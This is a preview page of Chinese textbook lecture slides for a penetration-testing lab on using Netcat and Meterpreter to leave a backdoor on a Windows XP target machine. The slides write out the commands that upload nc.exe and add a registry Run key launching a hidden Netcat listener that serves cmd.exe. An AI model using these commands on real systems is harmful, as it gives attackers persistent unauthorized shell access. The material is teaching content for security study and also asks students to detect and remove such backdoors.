资源预览内容
第1页 / 共14页
第2页 / 共14页
第3页 / 共14页
第4页 / 共14页
第5页 / 共14页
第6页 / 共14页
第7页 / 共14页
第8页 / 共14页
第9页 / 共14页
第10页 / 共14页
亲,该文档总共14页,到这儿已超出免费预览范围,如果喜欢就下载吧!
资源描述
网络空间安全技术实践教程,吕秋云,王小军,胡耿然,汪云路,王秋华 西安电子科技大学出版社,第四篇 渗透攻击测试实验篇,第十五章 漏洞利用实验 15.1 Netcat利用实验,网络空间安全技术实践教程,2,15.1 Netcat利用实验,实验目的: 熟练掌握Netcat工具的使用以及利用Meterpreter和Netcat在目标系统留取后门的流程。,网络空间安全技术实践教程,3,15.1 Netcat利用实验,实验原理: Netcat是一款用于发送和接收TCP和UDP流量的工具,它既可以以服务器模式来运行,也可以以客户端模式来运行。Netcat的功能十分强大,被人们称作“瑞士军刀”,它可以用来登录远程服务(类似于Telnet),在计算机之间传递文件,执行端口扫描,进行即时通信,搭建简单的服务器等等。,网络空间安全技术实践教程,4,15.1 Netcat利用实验,实验原理:,网络空间安全技术实践教程,5,连接到服务器: nc -options hostname ports ports . 监听或入站: nc -l -p port -options hostname port 常用参数: -d 后台隐藏运行(仅适用于Windows) -e program 建立连接后执行的程序 -l 监听状态(连接断开后监听停止) -L 监听状态(仅适用于Windows,连接断开后仍保持监听) -p port 本地端口号 -u UDP模式 -v 显示详细信息(-vv可显示更详细的信息) -w secs 设置时延 -z 零I/O模式(用于端口扫描),15.1 Netcat利用实验,实验要点说明:(实验难点说明) Meterpreter的使用 Netcat的使用,网络空间安全技术实践教程,6,15.1 Netcat利用实验,实验准备: (实验环境,实验先有知识技术说明) Kali Linux Netcat (Windows版本) Windows XP(靶机),网络空间安全技术实践教程,7,15.1 Netcat利用实验,实验步骤: (1)在留取后门之前,首先要获得目标系统的控制权。假设我们已经使用Metasploit对目标计算机完成了漏洞利用并获取了一个Meterpreter的shell,我们可以使用该shell与目标计算机进行交互。,网络空间安全技术实践教程,8,15.1 Netcat利用实验,实验步骤: (2)将Netcat程序上传到目标计算机上: meterpreter upload nc.exe C:WINDOWSsystem32,网络空间安全技术实践教程,9,15.1 Netcat利用实验,实验步骤: (3)使用reg setval命令将Netcat写入注册表的启动项: meterpreter reg setval -k HKLMSOFTWAREMicrosoftWindows CurrentVersionRun -v Netcat -d C:WINDOWSsystem32nc.exe -Ldp 12345 -e cmd.exe,网络空间安全技术实践教程,10,15.1 Netcat利用实验,实验步骤: (4)使用Netcat登陆目标计算机上的后门进行验证。,网络空间安全技术实践教程,11,15.1 Netcat利用实验,实验要求: 使用Metasploit和Netcat工具在Windows系统和Linux系统上留取后门。,网络空间安全技术实践教程,12,15.1 Netcat利用实验,实验扩展要求: 对Windows系统和Linux系统分别分析如何检查并清除Netcat后门程序。,网络空间安全技术实践教程,13,15.1 Netcat利用实验,实验视频:,网络空间安全技术实践教程,14,
收藏 下载该资源
网站客服QQ:2055934822
金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号